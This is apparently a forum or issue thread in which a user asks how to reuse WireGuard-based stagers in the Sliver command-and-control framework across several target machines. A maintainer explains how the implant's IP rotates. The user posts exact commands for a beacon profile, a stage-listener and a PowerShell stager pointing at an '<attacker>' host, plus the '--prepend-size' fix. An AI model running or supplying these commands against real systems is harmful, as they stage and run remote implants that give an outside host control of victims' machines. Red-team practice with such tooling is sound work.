Wireguard + stagers

[0xdcb]

I'm trying to play with stagers in sliver and am a little confused. I'm attempting to use wireguard sessions with stagers. I can get it working fine for one call back but having issues with getting more.
My current process is creating a new profile (shellcode - wg) -> creating a stage-listener (use previous profile) -> generate stager -u -f ps1 (for example)
I'm able to get one call back but attempting to run the same shellcode doesn't work for a second.
I'm thinking it has something to do with wg profiles all needing to generate unique configs and IPs.
I can't find anything about the intended workflow of wireguard + stagers and multiple callbacks on different machines.

[rkervella]

Wireguard implants have an hardcoded IP that is going to be rotated once the key exchange is performed (after the first connection). This is by design to allow us to reuse the same implant binary multiple times. This has nothing to do with stagers by the way. It would help if you could share the exact commands you typed (just redact the IP/domain names you're using) so we could figure out whether it's a bug or not.

[0xdcb]

wg
profiles new beacon -g <attacker>:53 -l -f shellcode win-shellcode-wg
stage-listener -p win-shellcode-wg -u http://<attacker>:80
generate stager -f ps1 -r http -L <attacker> -l 80

I would like to reuse both the "stage listener" and "generated stager" multiple times. This is easily possible with mtls.
What is the best way for me to reuse the same stager shellcode on multiple targets?

[0xdcb]

I have resolved this issue with the help of the slack channel. Looks like even tho you get one shell back to get more you need to use the "--prepend-size" flag when creating the stage-listener.
stage-listener -p win-shellcode-wg-beacon -u http://<attaker>:80 --prepend-size